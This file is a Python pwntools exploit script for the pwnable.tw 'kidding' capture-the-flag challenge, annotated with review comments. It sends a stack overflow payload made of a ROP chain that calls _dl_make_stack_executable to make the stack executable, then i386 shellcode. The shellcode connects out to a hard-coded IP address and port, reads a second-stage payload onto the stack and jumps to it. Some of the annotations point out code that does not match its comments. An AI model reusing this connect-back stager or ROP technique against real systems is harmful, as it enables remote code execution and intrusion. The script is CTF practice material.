from pwn import * import os import struct import random import time import sys import signal
# Optional suffix for the per-session helper files this script writes under
# /tmp, taken from the GDB_SALT environment variable.  An unset or empty
# variable yields the empty string.
salt = os.getenv('GDB_SALT') or ''
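def clear(signum=None, stack=None):
    """Remove this script's helper files from /tmp and exit.

    Installed as the handler for SIGINT/SIGHUP/SIGTERM (which supply
    ``signum`` and ``stack``) and also called directly at the end of the
    script, so both parameters are optional and unused.

    Deletes every entry of /tmp whose name starts with ``gdb_symbols``,
    ``gdb_pid`` or ``gdb_script`` followed by the module-level ``salt``.
    This replaces the earlier ``os.system('rm -f /tmp/gdb_symbols{salt}* ...')``:
    ``salt`` comes from the GDB_SALT environment variable, and splicing an
    environment-controlled string into a shell command line lets shell
    metacharacters in it change what the command does.  As with ``rm -f``,
    files that are missing or cannot be removed are ignored.

    Raises:
        SystemExit: always, with status 0.
    """
    print('Strip all debugging information')
    prefixes = tuple(p + salt for p in ('gdb_symbols', 'gdb_pid', 'gdb_script'))
    try:
        entries = os.listdir('/tmp')
    except OSError:
        # /tmp unreadable: nothing to clean up, still exit cleanly
        entries = []
    for name in entries:
        if name.startswith(prefixes):
            try:
                os.remove(os.path.join('/tmp', name))
            except OSError:
                # best effort, like rm -f: a vanished or undeletable file
                # must not prevent the exit
                pass
    sys.exit(0)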
# Run the cleanup handler on Ctrl-C, hangup and termination so the helper
# files written to /tmp below do not outlive the session.
for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]:
    signal.signal(sig, clear)

# Write a (here empty) C source file for an external gdb helper to read.
# The name /tmp/gdb_symbols<salt>.c is predictable and lives in a shared
# directory; any failure is only printed, and the handle is not closed if
# write() raises (a with-statement would cover that).
try:
    gdb_symbols = ''' '''
    f = open('/tmp/gdb_symbols{}.c'.replace('{}', salt), 'w')
    f.write(gdb_symbols)
    f.close()
except Exception as e:
    print(e)

# pwntools context: 32-bit x86 target and 'debug' logging, which echoes
# every byte sent and received, including the payload built below.
context.arch = 'i386'
context.log_level = 'debug'
execve_file = './kidding'

# Open the connection to the challenge service and parse the local copy of
# the binary so its symbol addresses can be used in the payload.
sh = remote('chall.pwnable.tw', 10303)
elf = ELF(execve_file)

# Record a pid and a gdb command script in /tmp for an external debugger.
# proc.pidof(sh) is resolved by pwntools from the local end of the socket;
# if nothing matches, the [0] raises and the except below only prints it.
# NOTE(review): gdbscript holds two `b` commands on one line here; gdb expects
# one command per line — confirm whether the original literal had a newline.
try:
    gdbscript = ''' b *0x80488B6 b *0x80bd13b '''
    f = open('/tmp/gdb_pid{}'.replace('{}', salt), 'w')
    f.write(str(proc.pidof(sh)[0]))
    f.close()
    f = open('/tmp/gdb_script{}'.replace('{}', salt), 'w')
    f.write(gdbscript)
    f.close()
except Exception as e:
    print(e)

# Values packed by flat() directly after the 8-byte filler.  The numeric
# entries are addresses hard-coded for this particular build of ./kidding;
# the two named entries are resolved from the local ELF, so they must match
# the remote binary exactly.  Their individual roles are not documented.
layout = [
    0,
    0x080b8536,
    elf.symbols['__libc_stack_end'],
    0x080583c9,
    7,
    0x080534fc,
    elf.symbols['_dl_make_stack_executable'],
    0x080bd13b,
]

# i386 machine code assembled by pwntools.  Going by the author's `;//`
# comments and the syscall numbers used (0x66 = socketcall with ebx 1 / 3,
# al 3 = read), it creates a socket, connects it to an address and port
# given as two hard-coded immediates, reads from that socket onto the
# stack and jumps there — so the process it runs in makes an outbound
# connection and executes whatever the peer sends back.
# NOTE(review): two of the inline comments do not match the code under them:
# after ";// dup2(soc, 0)" there is only `mov ebx, eax` (no dup2 syscall),
# and the read() target is esp (`mov ecx, esp`), not 0x804a000.
shellcode = asm(''' ;// socket(AF_INET, SOCK_STREAM, IPPROTO_IP) xor ebx, ebx mul ebx inc ebx push edx push ebx push 0x2 mov ecx, esp mov al, 0x66 int 0x80
;// dup2(soc, 0) mov ebx, eax
;// connect(soc, (struct sockaddr *)&serv_addr, sizeof(struct sockaddr_in)) push 0x3740e76f push 0xcaea0002 mov ecx, esp push 0x10 push ecx push ebx ;// fd mov ecx, esp mov bl, 3 mov al, 0x66 int 0x80
;// read(socket, 0x804a000, 255) mov ecx, esp mov dl, 255 mov bl, 0 mov al, 3 int 0x80
;// shellcode jmp ecx ''')

# Send 8 filler bytes, the packed layout and the machine code in one write.
# NOTE(review): under Python 3 pwntools, flat() and asm() return bytes and
# 'a' * 8 is str, so this concatenation raises TypeError — the script is
# presumably written for Python 2.
sh.send('a' * 8 + flat(layout) + shellcode)

# Hand the connection over to the user; on exit remove the /tmp helper files.
sh.interactive()
clear()
|